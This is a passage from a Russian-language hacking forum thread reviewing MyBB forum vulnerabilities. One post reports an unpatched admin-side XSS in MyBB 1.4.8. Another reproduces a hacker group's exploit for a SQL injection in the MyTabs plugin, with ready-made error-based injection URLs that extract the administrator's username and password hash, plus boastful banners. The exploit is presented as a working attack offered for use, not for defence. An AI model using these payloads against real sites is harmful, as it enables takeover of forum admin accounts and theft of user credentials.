Форумы [Обзор уязвимостей myBB]

Discussion in 'Уязвимости CMS/форумов' started by Goudini, 22 Nov 2006.

Page 2 of 2
  1. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    MyBB 1.4.8 последняя версия 26 June 2009

    очередной дырка пока не перекрыли)

    Доступ:Админка

    Уязвимость существует из-за недостаточной обработки входных данных в URL

    xss можно засунуть в Категории & Форума

    Решение:пока нету

    DEMO:http://sniffers.ueuo.com/
     
    #21 Nelzone, 2 Jul 2009
    Last edited: 2 Jul 2009
    1 person likes this.
  2. абвгдешка

    абвгдешка Member

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    MyBB MyTabs (plugin) 0day SQL injection vulnerability

    Code:
    =====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
 
# Exploit title :  MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !
 
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
 
     _         _        ____  _   _ _   _                   _       _ ____              _    
    / \  _   _| |_ ___ |  _ \| | | | \ | |   __ _ _ __   __| |   __| |  _ \   ___  __ _| |   
   / _ \| | | | __/ _ \| |_) | | | |  \| |  / _` | '_ \ / _` |  / _` | |_) | / __|/ _` | |   
  / ___ \ |_| | |_ (_) |  _ <| |_| | |\  | | (_| | | | | (_| | | (_| |  _ < _\__ \ (_| | |___
 /_/   \_\__,_|\__\___/|_| \_\\___/|_| \_|  \__,_|_| |_|\__,_|  \__,_|_| \_(_)___/\__, |_____|
                                                                                     |_|     
 
 
 
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
 
 
 
  ____                      _   ____  ____       _    _ _                 _               _
 |  _ \ _ __ ___  _   _  __| | |___ \| __ )     / \  | | |__   __ _ _ __ (_) __ _ _ __   | |
 | |_) | '__/ _ \| | | |/ _` |   __) |  _ \    / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \  | |
 |  __/| | | (_) | |_| | (_| |  / __/| |_) |  / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
 |_|   |_|  \___/ \__,_|\__,_| |_____|____/  /_/   \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
                                                                                             
 
# 2011
     
    #22 абвгдешка, 3 Aug 2011
(You must log in or sign up to post here.)
Page 2 of 2
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.